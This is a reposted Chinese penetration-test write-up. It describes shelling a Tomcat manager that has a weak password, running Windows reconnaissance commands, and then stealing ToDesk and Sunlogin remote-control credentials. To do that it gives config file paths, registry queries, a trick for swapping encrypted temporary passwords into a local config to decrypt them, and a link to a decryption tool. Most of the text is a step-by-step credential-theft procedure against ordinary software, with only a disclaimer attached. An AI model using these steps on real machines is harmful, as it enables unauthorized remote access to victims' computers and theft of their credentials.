0x01 弱口令YYDS
http://xxxxxxx:2903/manager/status
0x02 getshell
连接成功后接下来就是内网信息收集了
0x03 内网窥探
whoami
ipconfig /all
systeminfo
tasklist /svc
0x04 另辟蹊径
ToDesk 是一款多平台远程控制软件,支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作。
默认安装的ToDesk的配置文件在
C:\Program Files (x86)\ToDesk\config.ini
C:/Program Files/ToDesk/config.ini
C:/Program Files (x86)/ToDesk/config.ini
0x05 偷天换日
利用方法很简单,直接将受害机的临时密码复制出来,替换到本机的config.ini文件中,重启本机的ToDesk就可以看到明文密码了。
在上面说到我发现了两个配置文件,每个配置文件的临时密码还不一样,分别为:
tempAuthPassEx=16aec80f0bc8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa3eadxxx33
d721daxxxxxxxxxxxxxxx2d877ef6xxxxxxxxxxb2f
Version=4.1.1
tempAuthPassEx=f383dd44eaafxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxd3325cxxx40e
c20cdaxxxxxxxxxxxxxxxxb1fe64axxxxxxxxx0834
Version=4.6.2.3
敏感信息我都会进行模糊处理
后来发现可能是装了两个不同的版本,分别使用这两个版本的临时密码的密文进行还原明文,先看Version=4.1.1
还原后发现明文为343266,那就使用该密码进行尝试
第一次失败,还有一个密文进行尝试,Version=4.6.2.3
0x06 我还偷
安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
便携版:C:\ProgramData\Oray\SunloginClient\config.ini
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo
在 C:\Program Files\Oray\SunLogin\SunloginClient\
并没有获取到config.ini配置文件,只是看到了许多日志文件
换路径,通过摸索在 C:/ProgramData/Oray/SunloginClient/sys_config.ini
发现了向日葵的配置文件
使用离线工具进行解密,工具链接:
https://github.com/wafinfo/Sunflower_get_Password
python SunDecrypt.py 根据提示输入encry_pwd
0x07 总结
文章来源:先知社区(上*∮)
原文地址:https://xz.aliyun.com/t/12516
文章来源:排版潇湘信安
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干